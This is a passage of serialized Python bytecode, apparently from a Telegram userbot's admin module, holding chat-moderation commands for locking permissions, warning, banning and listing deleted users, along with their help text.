?(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\n\x00\x00\x00\xc3\x00\x00\x00s\xa0\x01\x00\x00|\x00j\x00\xa0\x01|\x00j\x02\xa1\x01I\x00d\x01H\x00}\x01|\x01j\x03r |\x01j\x03n\x02d\x02}\x02d\x03\xa0\x04|\x02\xa1\x01}\x03z\xb0|\x00j\x05\xa0\x06d\x04\xa1\x01s\x84|\x00j\x00\xa0\x07|\x00j\x02\xa1\x012\x00z43\x00d\x01H\x00W\x00}\x04|\x04j\x08sJ|\x03d\x05|\x04j\t\x9b\x00d\x06|\x04j\n\x9b\x00d\x07|\x04j\n\x9b\x00d\x08\x9d\x077\x00}\x03qJ6\x00nX|\x00j\x05\xa0\x06d\x04\xa1\x01}\x05|\x00j\x00j\x07|\x00j\x02|\x05\x9b\x00d\t\x8d\x022\x00z43\x00d\x01H\x00W\x00}\x04|\x04j\x08s\xa4|\x03d\x05|\x04j\t\x9b\x00d\x06|\x04j\n\x9b\x00d\x07|\x04j\n\x9b\x00d\x08\x9d\x077\x00}\x03q\xa46\x00W\x00n8\x04\x00t\x0bk\n\x90\x01r\x16\x01\x00}\x06\x01\x00z\x18|\x03d\nt\x0c|\x06\x83\x01\x17\x00d\x0b\x17\x007\x00}\x03W\x005\x00d\x01}\x06~\x06X\x00Y\x00n\x02X\x00z\x14|\x00\xa0\r|\x03\xa1\x01I\x00d\x01H\x00\x01\x00W\x00nn\x04\x00t\x0ek\n\x90\x01r\x9a\x01\x00\x01\x00\x01\x00|\x00\xa0\rd\x0c\xa1\x01I\x00d\x01H\x00\x01\x00t\x0fd\rd\x0e\x83\x02}\x07|\x07\xa0\x10|\x03\xa1\x01\x01\x00|\x07\xa0\x11\xa1\x00\x01\x00|\x00j\x00j\x12|\x00j\x02d\x0fd\x10\xa0\x04|\x02\xa1\x01|\x00j\nd\x11\x8d\x04I\x00d\x01H\x00\x01\x00t\x13d\x0f\x83\x01\x01\x00Y\x00n\x02X\x00d\x01S\x00)\x12zA For .usersdel command, list all of the deleted users in a chat. Nrx\x00\x00\x00z\x15deletedUsers in {}: \nro\x00\x00\x00r\x8c\x00\x00\x00rG\x00\x00\x00r\x8d\x00\x00\x00rU\x00\x00\x00r\x8e\x00\x00\x00r{\x00\x00\x00rz\x00\x00\x00zADamn, this is a huge group. Uploading deletedusers lists as file.r\x90\x00\x00\x00r\x91\x00\x00\x00z\x14deleteduserslist.txtr\x92\x00\x00\x00r\x93\x00\x00\x00r\x94\x00\x00\x00r\x99\x00\x00\x00r@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\x0cget_usersdel"\x03\x00\x00sB\x00\x00\x00\x00\x03\x14\x01\x10\x01\n\x01\x02\x01\x0c\x01\x1a\x01\x06\x01(\x04\x0c\x01\x06\x01\x04\x00\x04\xff\x12\x02\x06\x01*\x03\x12\x01&\x01\x02\x01\x14\x01\x10\x01\x04\x01\x02\xff\n\x02\n\x01\n\x01\x08\x01\x06\x01\x04\x01\x02\x01\x08\x01\x04\xfc\x0c\x06r\xaa\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\x00\x00\x00\n\x00\x00\x00\xc3\x00\x00\x00sD\x01\x00\x00|\x00j\x00\xa0\x01d\x01\xa1\x01\xa0\x02d\x02d\x01\xa1\x02}\x01d\x03}\x02|\x00j\x03rZt\x04|\x01\x83\x01d\x04k\x02sZ|\x00\xa0\x05\xa1\x00I\x00d\x03H\x00}\x03|\x00j\x06\xa0\x07|\x03j\x08\xa1\x01I\x00d\x03H\x00}\x04|\x00j\x00\xa0\x01d\x01\xa1\x01}\x02n\xe2|\x01\x90\x01r<|\x01d\x05\x19\x00}\x05t\x04|\x01\x83\x01d\x04k\x02r||\x01d\x01\x19\x00}\x02|\x05\xa0\t\xa1\x00r\x8ct\n|\x05\x83\x01}\x05|\x05s\xa4|\x00\xa0\x0bd\x06\xa1\x01I\x00d\x03H\x00\x01\x00d\x03S\x00|\x00j\x0cj\rd\x03k\tr\xe2|\x00j\x0cj\rd\x05\x19\x00}\x06t\x0e|\x06t\x0f\x83\x02r\xe2|\x06j\x10}\x07|\x00j\x06\xa0\x07|\x07\xa1\x01I\x00d\x03H\x00}\x04|\x04S\x00z\x16|\x00j\x06\xa0\x07|\x05\xa1\x01I\x00d\x03H\x00}\x04W\x00nB\x04\x00t\x11t\x12f\x02k\n\x90\x01r:\x01\x00}\x08\x01\x00z\x1e|\x00\xa0\x0bt\x13|\x08\x83\x01\xa1\x01I\x00d\x03H\x00\x01\x00W\x00Y\x00\xa2\x04d\x03S\x00d\x03}\x08~\x08X\x00Y\x00n\x02X\x00|\x04|\x02f\x02S\x00)\x07z8 Get the deleted user from argument or replied message. ro\x00\x00\x00r{\x00\x00\x00Nrp\x00\x00\x00r\x01\x00\x00\x00z0`Pass the deleted user\'s username, id or reply!`r\x9c\x00\x00\x00r\xa3\x00\x00\x00r@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\x16get_userdel_from_eventJ\x03\x00\x00s:\x00\x00\x00\x00\x02\x14\x01\x04\x01\x12\x01\x0e\x01\x14\x01\x0e\x01\x06\x01\x08\x01\x0c\x01\x08\x02\x08\x01\x08\x02\x04\x01\x10\x01\x04\x02\x0c\x01\x0c\x02\x04\x01\x02\xff\x04\x02\x06\x01\x12\x01\x04\x01\x02\x01\x16\x01\x16\x01\x14\x01\x18\x02r\xab\x00\x00\x00c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\n\x00\x00\x00\xc3\x00\x00\x00sn\x00\x00\x00t\x00|\x00t\x01\x83\x02r\x12t\x02|\x00\x83\x01}\x00z\x16|\x01j\x03\xa0\x04|\x00\xa1\x01I\x00d\x00H\x00}\x02W\x00n@\x04\x00t\x05t\x06f\x02k\nrh\x01\x00}\x03\x01\x00z\x1e|\x01\xa0\x07t\x01|\x03\x83\x01\xa1\x01I\x00d\x00H\x00\x01\x00W\x00Y\x00\xa2\x04d\x00S\x00d\x00}\x03~\x03X\x00Y\x00n\x02X\x00|\x02S\x00r\xa7\x00\x00\x00r\xa8\x00\x00\x00r\xa9\x00\x00\x00r@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\x13get_userdel_from_ido\x03\x00\x00s\x10\x00\x00\x00\x00\x01\n\x01\x08\x02\x02\x01\x16\x01\x14\x01\x14\x01\x18\x02r\xac\x00\x00\x00z\r^\\.lock ?(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\r\x00\x00\x00\xc3\x00\x00\x00s\xfc\x01\x00\x00|\x00j\x00\xa0\x01d\x01\xa1\x01\xa0\x02\xa1\x00}\x01|\x00j\x03}\x02d\x00}\x03d\x00}\x04d\x00}\x05d\x00}\x06d\x00}\x07d\x00}\x08d\x00}\td\x00}\nd\x00}\x0bd\x00}\x0c|\x01d\x02k\x02rRd\x03}\x03d\x04}\r\x90\x01n\x0e|\x01d\x05k\x02rdd\x03}\x04d\x05}\rn\xfc|\x01d\x06k\x02rvd\x03}\x05d\x07}\rn\xea|\x01d\x08k\x02r\x88d\x03}\x06d\t}\rn\xd8|\x01d\nk\x02r\x9ad\x03}\x07d\x0b}\rn\xc6|\x01d\x0ck\x02r\xacd\x03}\x08d\r}\rn\xb4|\x01d\x0ek\x02r\xbed\x03}\td\x0f}\rn\xa2|\x01d\x10k\x02r\xd0d\x03}\nd\x11}\rn\x90|\x01d\x12k\x02r\xe2d\x03}\x0bd\x13}\rn~|\x01d\x14k\x02r\xf4d\x03}\x0cd\x15}\rnl|\x01d\x16k\x02\x90\x01r,d\x03}\x03d\x03}\x04d\x03}\x05d\x03}\x06d\x03}\x07d\x03}\x08d\x03}\td\x03}\nd\x03}\x0bd\x03}\x0cd\x17}\rn4|\x01\x90\x01sF|\x00\xa0\x04d\x18\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00|\x00\xa0\x04d\x19|\x01\x9b\x00\x9d\x02\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00t\x05d\x00|\x03|\x04|\x05|\x06|\x07|\x08|\t|\n|\x0b|\x0cd\x1a\x8d\x0b}\x0ez4|\x00\xa0\x06t\x07|\x02|\x0ed\x1b\x8d\x02\xa1\x01I\x00d\x00H\x00\x01\x00|\x00\xa0\x04d\x1c|\r\x9b\x00d\x1d\x9d\x03\xa1\x01I\x00d\x00H\x00\x01\x00W\x00nD\x04\x00t\x08k\n\x90\x01r\xf6\x01\x00}\x0f\x01\x00z$|\x00\xa0\x04d\x1et\t|\x0f\x83\x01\x9b\x00\x9d\x02\xa1\x01I\x00d\x00H\x00\x01\x00W\x00Y\x00\xa2\x04d\x00S\x00d\x00}\x0f~\x0fX\x00Y\x00n\x02X\x00d\x00S\x00)\x1fNro\x00\x00\x00r\x86\x00\x00\x00T\xda\x08messagesr4\x00\x00\x00\xda\x07sticker\xda\x08stickers\xda\x03gif\xda\x04GIFs\xda\x04game\xda\x05games\xda\x06inline\xfa\x0binline bots\xda\x04poll\xda\x05polls\xda\x06invite\xda\x07invitesr\x87\x00\x00\x00\xda\x04pinsr\x7f\x00\x00\x00\xfa\tchat info\xda\x03all\xda\neverythingz\x19`I can\'t lock nothing !!`z\x15`Invalid lock type:` \xa9\x0br \x00\x00\x00r"\x00\x00\x00r#\x00\x00\x00r$\x00\x00\x00r%\x00\x00\x00r&\x00\x00\x00r\'\x00\x00\x00Z\nsend_pollsrD\x00\x00\x00rF\x00\x00\x00rE\x00\x00\x00\xa9\x02Z\x04peerZ\rbanned_rightsz\x08`Locked \xfa\x12 for this chat !!`\xfa1`Do I have proper rights for that ??`\n**Error:** \xa9\nrq\x00\x00\x00rr\x00\x00\x00rs\x00\x00\x00r:\x00\x00\x00r.\x00\x00\x00r\x15\x00\x00\x00r6\x00\x00\x00Z"EditChatDefaultBannedRightsRequest\xda\rBaseExceptionrX\x00\x00\x00)\x10r\xa4\x00\x00\x00\xda\tinput_str\xda\x07peer_idr\x86\x00\x00\x00r4\x00\x00\x00r\xae\x00\x00\x00r\xb0\x00\x00\x00\xda\x05gamee\xda\x07ainline\xda\x05gpoll\xda\x07adduser\xda\x04cpin\xda\nchangeinfo\xda\x04whatZ\x0block_rightsr\x8a\x00\x00\x00r@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\x05locks{\x03\x00\x00s\xa8\x00\x00\x00\x00\x02\x10\x01\x06\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x08\x01\x04\x01\x08\x01\x08\x01\x04\x01\x06\x01\x08\x01\x04\x01\x06\x01\x08\x01\x04\x01\x06\x01\x08\x01\x04\x01\x06\x01\x08\x01\x04\x01\x06\x01\x08\x01\x04\x01\x06\x01\x08\x01\x04\x01\x06\x01\x08\x01\x04\x01\x06\x01\x08\x01\x04\x01\x06\x01\n\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x06\x02\x06\x01\x10\x01\x04\x02\x16\x01\x04\x02\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\xf5\x06\r\x02\x01\x04\x01\x04\x01\x02\xff\x04\xff\n\x03\x1c\x01\x12\x01\x04\x01\x0c\xff\n\x02r\xcd\x00\x00\x00z\x0e^.unlock ?(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\r\x00\x00\x00\xc3\x00\x00\x00s\xfc\x01\x00\x00|\x00j\x00\xa0\x01d\x01\xa1\x01\xa0\x02\xa1\x00}\x01|\x00j\x03}\x02d\x00}\x03d\x00}\x04d\x00}\x05d\x00}\x06d\x00}\x07d\x00}\x08d\x00}\td\x00}\nd\x00}\x0bd\x00}\x0c|\x01d\x02k\x02rRd\x03}\x03d\x04}\r\x90\x01n\x0e|\x01d\x05k\x02rdd\x03}\x04d\x05}\rn\xfc|\x01d\x06k\x02rvd\x03}\x05d\x07}\rn\xea|\x01d\x08k\x02r\x88d\x03}\x06d\t}\rn\xd8|\x01d\nk\x02r\x9ad\x03}\x07d\x0b}\rn\xc6|\x01d\x0ck\x02r\xacd\x03}\x08d\r}\rn\xb4|\x01d\x0ek\x02r\xbed\x03}\td\x0f}\rn\xa2|\x01d\x10k\x02r\xd0d\x03}\nd\x11}\rn\x90|\x01d\x12k\x02r\xe2d\x03}\x0bd\x13}\rn~|\x01d\x14k\x02r\xf4d\x03}\x0cd\x15}\rnl|\x01d\x16k\x02\x90\x01r,d\x03}\x03d\x03}\x04d\x03}\x05d\x03}\x06d\x03}\x07d\x03}\x08d\x03}\td\x03}\nd\x03}\x0bd\x03}\x0cd\x17}\rn4|\x01\x90\x01sF|\x00\xa0\x04d\x18\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00|\x00\xa0\x04d\x19|\x01\x9b\x00\x9d\x02\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00t\x05d\x00|\x03|\x04|\x05|\x06|\x07|\x08|\t|\n|\x0b|\x0cd\x1a\x8d\x0b}\x0ez4|\x00\xa0\x06t\x07|\x02|\x0ed\x1b\x8d\x02\xa1\x01I\x00d\x00H\x00\x01\x00|\x00\xa0\x04d\x1c|\r\x9b\x00d\x1d\x9d\x03\xa1\x01I\x00d\x00H\x00\x01\x00W\x00nD\x04\x00t\x08k\n\x90\x01r\xf6\x01\x00}\x0f\x01\x00z$|\x00\xa0\x04d\x1et\t|\x0f\x83\x01\x9b\x00\x9d\x02\xa1\x01I\x00d\x00H\x00\x01\x00W\x00Y\x00\xa2\x04d\x00S\x00d\x00}\x0f~\x0fX\x00Y\x00n\x02X\x00d\x00S\x00)\x1fNro\x00\x00\x00r\x86\x00\x00\x00Fr\xad\x00\x00\x00r4\x00\x00\x00r\xae\x00\x00\x00r\xaf\x00\x00\x00r\xb0\x00\x00\x00r\xb1\x00\x00\x00r\xb2\x00\x00\x00r\xb3\x00\x00\x00r\xb4\x00\x00\x00r\xb5\x00\x00\x00r\xb6\x00\x00\x00r\xb7\x00\x00\x00r\xb8\x00\x00\x00r\xb9\x00\x00\x00r\x87\x00\x00\x00r\xba\x00\x00\x00r\x7f\x00\x00\x00r\xbb\x00\x00\x00r\xbc\x00\x00\x00r\xbd\x00\x00\x00z\x1b`I can\'t unlock nothing !!`z\x17`Invalid unlock type:` r\xbe\x00\x00\x00r\xbf\x00\x00\x00z\n`Unlocked r\xc0\x00\x00\x00r\xc1\x00\x00\x00r\xc2\x00\x00\x00)\x10r\xa4\x00\x00\x00r\xc4\x00\x00\x00r\xc5\x00\x00\x00r\x86\x00\x00\x00r4\x00\x00\x00r\xae\x00\x00\x00r\xb0\x00\x00\x00r\xc6\x00\x00\x00r\xc7\x00\x00\x00r\xc8\x00\x00\x00r\xc9\x00\x00\x00r\xca\x00\x00\x00r\xcb\x00\x00\x00r\xcc\x00\x00\x00Z\runlock_rightsr\x8a\x00\x00\x00r@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\trem_locks\xd3\x03\x00\x00s\xa8\x00\x00\x00\x00\x02\x10\x01\x06\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x08\x01\x04\x01\x08\x01\x08\x01\x04\x01\x06\x01\x08\x01\x04\x01\x06\x01\x08\x01\x04\x01\x06\x01\x08\x01\x04\x01\x06\x01\x08\x01\x04\x01\x06\x01\x08\x01\x04\x01\x06\x01\x08\x01\x04\x01\x06\x01\x08\x01\x04\x01\x06\x01\x08\x01\x04\x01\x06\x01\n\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x06\x02\x06\x01\x10\x01\x04\x02\x16\x01\x04\x02\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\xf5\x06\r\x02\x01\x04\x01\x04\x01\x02\xff\x04\xff\n\x03\x1c\x01\x12\x01\x04\x01\x0c\xff\n\x02r\xce\x00\x00\x00z\x11^.warn(?: |$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00sd\x01\x00\x00|\x00j\x00r\nd\x00S\x00|\x00\xa0\x01\xa1\x00I\x00d\x00H\x00}\x01|\x01j\x02}\x02|\x01j\x03}\x03|\x00j\x04\xa0\x05d\x01\xa1\x01}\x04|\x00\xa0\x06\xa1\x00I\x00d\x00H\x00}\x05|\x02sZ|\x03sZ|\x00\xa0\x07d\x02\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00t\x08|\x00j\t|\x05j\n\x83\x02I\x00d\x00H\x00r~|\x00\xa0\x07d\x03\xa1\x01I\x00d\x00H\x00S\x00t\x0b\xa0\x0c|\x00j\t\xa1\x01\\\x02}\x06}\x07t\x0b\xa0\r|\x05j\n|\x00j\t|\x04\xa1\x03\\\x02}\x08}\t|\x08|\x06k\x05\x90\x01r"|\x00j\x0ej\x0f|\x01|\x05j\nd\x00d\x04d\x05\x8d\x04I\x00d\x00H\x00\x01\x00|\x07r\xf6d\x06\xa0\x10|\x06|\x05j\n\xa1\x02}\n|\x00j\x0e\xa0\x11|\x00j\t|\x05j\n\xa1\x02I\x00d\x00H\x00\x01\x00n*|\x00j\x0ej\x0f|\x01|\x05j\nd\x00d\x04d\x05\x8d\x04I\x00d\x00H\x00\x01\x00d\x07\xa0\x10|\x06|\x05j\n\xa1\x02}\nn*d\x08\xa0\x10|\x05j\n|\x08|\x06\xa1\x03}\n|\x04\x90\x01rL|\nd\t\xa0\x10t\x12\xa0\x13|\x04\xa1\x01\xa1\x017\x00}\n|\x00j\x07|\nd\nd\x0b\x8d\x02I\x00d\x00H\x00\x01\x00d\x00S\x00)\x0cNro\x00\x00\x00\xfa\x1a`Bruh I Am Not Admin Here`z\x12`User is an admin`F)\x02r \x00\x00\x00r!\x00\x00\x00zG{} warnings, <u><a href=\'tg://user?id={}\'>user</a></u> has been kicked!zG{} warnings, <u><a href=\'tg://user?id={}\'>user</a></u> has been banned!zJ<u><a href=\'tg://user?id={}\'>user</a></u> has {}/{} warnings... watch out!z\x19\nReason for last warn:\n{}r|\x00\x00\x00r}\x00\x00\x00)\x14\xda\x08fwd_fromr0\x00\x00\x00r1\x00\x00\x00r2\x00\x00\x00rq\x00\x00\x00rr\x00\x00\x00r/\x00\x00\x00r.\x00\x00\x00r\x06\x00\x00\x00r:\x00\x00\x00r\x85\x00\x00\x00\xda\x03sql\xda\x10get_warn_settingZ\twarn_userr6\x00\x00\x00Z\x10edit_permissionsr\x95\x00\x00\x00r\x88\x00\x00\x00r|\x00\x00\x00Z\x06escape)\x0br\xa4\x00\x00\x00r>\x00\x00\x00r?\x00\x00\x00r2\x00\x00\x00Z\x0bwarn_reason\xda\rreply_message\xda\x05limit\xda\tsoft_warn\xda\tnum_warns\xda\x07reasonsrZ\x00\x00\x00r@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\x01_*\x04\x00\x00s2\x00\x00\x00\x00\x02\x06\x01\x04\x01\x0e\x01\x06\x01\x06\x01\x0c\x01\x0e\x02\x08\x01\x10\x01\x04\x02\x14\x01\x10\x02\x10\x01\x16\x01\n\x01\x1c\x01\x04\x01\x0e\x01\x1a\x02\x1c\x01\x10\x02\x10\x01\x06\x01\x14\x02r\xd8\x00\x00\x00z\x15^.getwarns(?: |$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00s\xb0\x00\x00\x00|\x00j\x00r\nd\x00S\x00|\x00\xa0\x01\xa1\x00I\x00d\x00H\x00}\x01t\x02\xa0\x03|\x01j\x04|\x00j\x05\xa1\x02}\x02|\x02r\x9c|\x02d\x01\x19\x00d\x01k\x03r\x9c|\x02\\\x02}\x03}\x04t\x02\xa0\x06|\x00j\x05\xa1\x01\\\x02}\x05}\x06|\x04r\x82d\x02\xa0\x07|\x03|\x05\xa1\x02}\x07|\x07d\x037\x00}\x07|\x07|\x047\x00}\x07|\x00\xa0\x08|\x07\xa1\x01I\x00d\x00H\x00\x01\x00q\xac|\x00\xa0\x08d\x04\xa0\x07|\x03|\x05\xa1\x02\xa1\x01I\x00d\x00H\x00\x01\x00n\x10|\x00\xa0\x08d\x05\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00)\x06Nr\x01\x00\x00\x00z8This user has {}/{} warnings, for the following reasons:z\x02\r\nz>This user has {} / {} warning, but no reasons for any of them.z"This user hasn\'t got any warnings!)\tr\xd0\x00\x00\x00r/\x00\x00\x00r\xd1\x00\x00\x00Z\tget_warnsr\x85\x00\x00\x00r:\x00\x00\x00r\xd2\x00\x00\x00r\x95\x00\x00\x00r.\x00\x00\x00)\x08r\xa4\x00\x00\x00r\xd3\x00\x00\x00\xda\x06resultr\xd6\x00\x00\x00r\xd7\x00\x00\x00r\xd4\x00\x00\x00r\xd5\x00\x00\x00\xda\x04textr@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00r\xd8\x00\x00\x00L\x04\x00\x00s\x1c\x00\x00\x00\x00\x02\x06\x01\x04\x01\x0e\x01\x10\x01\x10\x01\x08\x01\x10\x01\x04\x01\x0c\x01\x08\x01\x08\x01\x12\x02\x1a\x02z\x17^.strongwarn(?: |$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x04\x00\x00\x00\xc3\x00\x00\x00s\xe6\x00\x00\x00|\x00\xa0\x00\xa1\x00I\x00d\x00H\x00}\x01|\x01j\x01}\x02|\x01j\x02}\x03|\x00j\x03\xa0\x04d\x01\xa1\x01}\x04|\x02sB|\x03sB|\x00\xa0\x05d\x02\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00|\x04r\xac|\x04d\x03k\x06rpt\x06\xa0\x07|\x00j\x08d\x04\xa1\x02\x01\x00|\x00\xa0\x05d\x05\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00|\x04d\x06k\x06r\x9at\x06\xa0\x07|\x00j\x08d\x07\xa1\x02\x01\x00|\x00\xa0\x05d\x08\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00|\x00\xa0\x05d\t\xa1\x01I\x00d\x00H\x00\x01\x00n6t\x06\xa0\t|\x00j\x08\xa1\x01\\\x02}\x05}\x06|\x06r\xd2|\x00\xa0\x05d\n\xa1\x01I\x00d\x00H\x00\x01\x00n\x10|\x00\xa0\x05d\x0b\xa1\x01I\x00d\x00H\x00\x01\x00d\x0cS\x00)\rNro\x00\x00\x00r\xcf\x00\x00\x00)\x02Z\x02onZ\x03yesFz\x1eWarn Strength Set To Ban User.)\x02Z\x03offZ\x02noTz\x1fWarn Strength Set To Kick User.z\x1a`Please send Correct Arg!`z I Am **kicking** User\'s For Now.z\x1fI Am **Baning** User\'s For Now.rA\x00\x00\x00)\nr0\x00\x00\x00r1\x00\x00\x00r2\x00\x00\x00rq\x00\x00\x00rr\x00\x00\x00r.\x00\x00\x00r\xd1\x00\x00\x00\xda\x11set_warn_strengthr:\x00\x00\x00r\xd2\x00\x00\x00)\x07r\xa4\x00\x00\x00r>\x00\x00\x00r?\x00\x00\x00r2\x00\x00\x00r\xa5\x00\x00\x00r\xd4\x00\x00\x00r\xd5\x00\x00\x00r@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00r\xdb\x00\x00\x00_\x04\x00\x00s,\x00\x00\x00\x00\x02\x0e\x01\x06\x01\x06\x01\x0c\x02\x08\x01\x10\x01\x04\x02\x04\x01\x08\x01\x0e\x01\x10\x01\x04\x02\x08\x01\x0e\x01\x10\x01\x04\x03\x12\x02\x10\x01\x04\x01\x12\x02\x10\x01r\xdb\x00\x00\x00z\x14^.setwarn(?: |$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x05\x00\x00\x00\xc3\x00\x00\x00s\xbc\x00\x00\x00|\x00\xa0\x00\xa1\x00I\x00d\x00H\x00}\x01|\x01j\x01}\x02|\x01j\x02}\x03|\x00j\x03\xa0\x04d\x01\xa1\x01}\x04|\x02sB|\x03sB|\x00\xa0\x05d\x02\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00|\x04r\x92t\x06|\x04\x83\x01d\x03k\x00rd|\x00\xa0\x05d\x04\xa1\x01I\x00d\x00H\x00\x01\x00q\xb8t\x07\xa0\x08|\x00j\tt\x06|\x04\x83\x01\xa1\x02\x01\x00|\x00\xa0\x05d\x05\xa0\n|\x04\xa1\x01\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00n&t\x07\xa0\x0b|\x00j\t\xa1\x01\\\x02}\x05}\x06|\x00\xa0\x05d\x06\xa0\n|\x05\xa1\x01\xa1\x01I\x00d\x00H\x00\x01\x00d\x07S\x00)\x08Nro\x00\x00\x00r\xcf\x00\x00\x00\xe9\x03\x00\x00\x00z\x1e`The minimum warn limit is 3!`z\x1e`Updated the warn limit to` {}z\x1e`The current warn limit is {}`rA\x00\x00\x00)\x0cr0\x00\x00\x00r1\x00\x00\x00r2\x00\x00\x00rq\x00\x00\x00rr\x00\x00\x00r.\x00\x00\x00r\x9f\x00\x00\x00r\xd1\x00\x00\x00\xda\x0eset_warn_limitr:\x00\x00\x00r\x95\x00\x00\x00r\xd2\x00\x00\x00)\x07r\xa4\x00\x00\x00r>\x00\x00\x00r?\x00\x00\x00r2\x00\x00\x00r\xc4\x00\x00\x00r\xd4\x00\x00\x00r\xd5\x00\x00\x00r@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00r\xdd\x00\x00\x00\x7f\x04\x00\x00s \x00\x00\x00\x00\x02\x0e\x01\x06\x01\x06\x01\x0c\x02\x08\x01\x10\x01\x04\x02\x04\x01\x0c\x01\x12\x02\x12\x01\x16\x01\x06\x03\x10\x01\x16\x01r\xdd\x00\x00\x00z\x17^.resetwarns(?: |$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\xc3\x00\x00\x00s<\x00\x00\x00|\x00j\x00r\nd\x00S\x00|\x00\xa0\x01\xa1\x00I\x00d\x00H\x00}\x01t\x02\xa0\x03|\x01j\x04|\x00j\x05\xa1\x02\x01\x00|\x00\xa0\x06d\x01\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00)\x02Nz\x19Warnings have been reset!)\x07r\xd0\x00\x00\x00r/\x00\x00\x00r\xd1\x00\x00\x00Z\x0breset_warnsr\x85\x00\x00\x00r:\x00\x00\x00r.\x00\x00\x00)\x02r\xa4\x00\x00\x00r\xd3\x00\x00\x00r@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00r\xd8\x00\x00\x00\x98\x04\x00\x00s\n\x00\x00\x00\x00\x02\x06\x01\x04\x01\x0e\x01\x10\x01r?\x00\x00\x00a\xd1\x05\x00\x00`.promote` <username/reply> <custom rank (optional)>\nUsage: Provides admin rights to the person in the chat.\n\n`.demote` <username/reply>\nUsage: Revokes the person\'s admin permissions in the chat.\n\n`.ban` <username/reply> <reason (optional)>\nUsage: Bans the person off your chat.\n\n`.unban` <username/reply>\nUsage: Removes the ban from the person in the chat.\n\n`.mute` <username/reply> <reason (optional)>\nUsage: Mutes the person in the chat, works on admins too.\n\n`.unmute` <username/reply>\nUsage: Removes the person from the muted list.\n\n`.gmute` <username/reply> <reason (optional)>\nUsage: Mutes the person in all groups you have in common with them.\n\n`.ungmute` <username/reply>\nUsage: Reply someone\'s message with .ungmute to remove them from the gmuted list.\n\n`.zombies`\nUsage: Searches for deleted accounts in a group. Use .zombies clean to remove deleted accounts from the group.\n\n`.admins`\nUsage: Retrieves a list of admins in the chat.\n\n`.kick`\nUsage: kick users from groups.\n\n`.users` or `.users` <name of member>\nUsage: Retrieves all (or queried) users in the chat.\n\n`.setgpic` <reply to image>\nUsage: Changes the group\'s display picture.\n\n`.warn reason`\nUsage: warns users.\n\n`.resetwarns`\nUsage: Reset user\'s warns.\n\n`.getwarns`\nUsage: Shows the reason of warning.\n\n`.setflood` value.\nUsage:Sets flood limit in the current chat.\n\n`.strongwarn` <yes/on or no/off>.\nUsage:sets warn mode i.e <strong warn:bans user, soft warn: kicks user>.\n\n`.setwarn` value.\nUsage:sets warn limit.)Z\xda\x07__doc__Z\x07asyncior\x02\x00\x00\x00\xda\x02osr\x03\x00\x00\x00\xda\x02io\xda\x02rer|\x00\x00\x00Z\x07loggingZ$userbot.modules.sql_helper.warns_sql\xda\x07modulesZ\nsql_helperZ\twarns_sqlr\xd1\x00\x00\x00Z\x08telethonr\x04\x00\x00\x00r\x05\x00\x00\x00Z\x13userbot.utils.toolsr\x06\x00\x00\x00Z\x0ftelethon.errorsr\x07\x00\x00\x00r\x08\x00\x00\x00r\t\x00\x00\x00r\n\x00\x00\x00r\x0b\x00\x00\x00Z\x1ctelethon.errors.rpcerrorlistr\x0c\x00\x00\x00r\r\x00\x00\x00Z\x1etelethon.tl.functions.channelsr\x0e\x00\x00\x00r\x0f\x00\x00\x00r\x10\x00\x00\x00Z\x1etelethon.tl.functions.messagesr\x11\x00\x00\x00Z\x11telethon.tl.typesr\x12\x00\x00\x00r\x13\x00\x00\x00r\x14\x00\x00\x00r\x15\x00\x00\x00r\x16\x00\x00\x00r\x17\x00\x00\x00r\x18\x